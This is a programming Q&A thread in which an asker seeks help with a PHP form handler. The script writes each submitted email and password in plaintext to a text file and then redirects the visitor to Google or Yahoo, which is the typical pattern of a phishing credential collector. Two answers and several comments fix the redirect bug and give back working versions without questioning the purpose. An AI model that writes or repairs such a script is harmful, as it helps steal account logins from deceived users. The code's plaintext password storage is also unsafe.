# this is not redirect to the relevent web site

Tags: php, redirect

I use this code to save username and password in a text file and finally redirect into a website.  bt this code does not redirect to the google. when I run it within local host it works perfectly(in localhost I comment "header("Location: http://www.yahoo.com");" ) ... but when I put this in a host .. **it doesn't. no any error messages either** but once it works perfectly

```
<html>
<body>

<?php

$eml = $_POST["email"];
$pw = $_POST["pass"];

if (empty($pw) || empty($eml))
  {

  header("Location: http://www.yahoo.com");
  exit;
  }
  else

$file = "mydata.txt";
$source = fopen ($file, 'a' ) or die;

$info = $_POST["email"];
fwrite($source, "$info\r\n");

$info = $_POST["pass"];
fwrite($source, "$info\r\n");

fwrite($source, "\r\n");
fclose ($source);
?>
<script>location.href='http://www.google.com';</script>

</body>
</html>
```

Comment: Put `<?php` part at the very top of the file. And try to turn on all errors `error_reporting(E_ALL);` on your dev environement. You should have an error like "Cannot send headers information, headers already sent"

Comment: Also remove the `else` from your code as it doesn't bring any value to it.

Comment: You're already sending output to the browser (everything before '<?php') before setting the header. A header needs to be executed before any output, otherwise it doesn't work...

Answer (score 1):

You need to place header before there is any output on the browser:

```
<?php

$eml = $_POST["email"];
$pw = $_POST["pass"];

if (empty($pw) || empty($eml))
  {

  header("Location: http://www.yahoo.com");
  exit;
  }
  else

$file = "mydata.txt";
$source = fopen ($file, 'a' ) or die;

$info = $_POST["email"];
fwrite($source, "$info\r\n");

$info = $_POST["pass"];
fwrite($source, "$info\r\n");

fwrite($source, "\r\n");
fclose ($source);
?>
<html>
<body>

<script>location.href='http://www.google.com';</script>

</body>
</html>
```

Answer (score 0):

first of it, you could delete the "else".

then, if you want to write header, make sure you haven't any output, for this, the

```
<html>
<body>
```

before

so, you should to move above code after ?> tag, and make sure there isn't any spaces before

```
<?php

$eml = $_POST["email"];
$pw = $_POST["pass"];

if (empty($pw) || empty($eml))
  {

  header("Location: http://www.yahoo.com");
  exit;
  }

$file = "mydata.txt";
$source = fopen ($file, 'a' ) or die;

$info = $_POST["email"];
fwrite($source, "$info\r\n");

$info = $_POST["pass"];
fwrite($source, "$info\r\n");

fwrite($source, "\r\n");
fclose ($source);
?>
<html>
<body>

<script>location.href='http://www.google.com';</script>

</body>
</html>
```